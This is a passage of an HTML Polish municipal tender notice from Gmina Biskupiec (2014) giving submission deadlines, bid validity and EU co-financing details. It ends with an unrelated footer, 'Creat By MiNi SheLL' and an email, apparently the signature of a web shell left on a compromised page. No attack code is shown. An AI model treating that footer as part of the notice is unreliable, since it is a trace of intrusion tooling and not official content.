c. przekształcenie firmy, zmiana nazwy firmy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.biskupiec.pl/ogloszenia_przetargi.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Biskupiec
al. Niepodległości 2, 11-300 Biskupiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2014 godzina 12:00, miejsce: Gmina Biskupiec
al. Niepodległości 2, 11-300 Biskupiec
pokój nr 10 (KANCELARIA), parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w związku z umową o dofinansowanie projektu Wzrost atrakcyjności i konkurencyjności terenów inwestycyjnych w Gminie Biskupiec w ramach Programu Operacyjnego Innowacyjna Gospodarka Priorytet 6: Polska gospodarka na rynku międzynarodowym Poddziałanie 6.2.2: Wsparcie działań studyjno-koncepcyjnych w ramach przygotowania terenów inwestycyjnych dla projektów inwestycyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com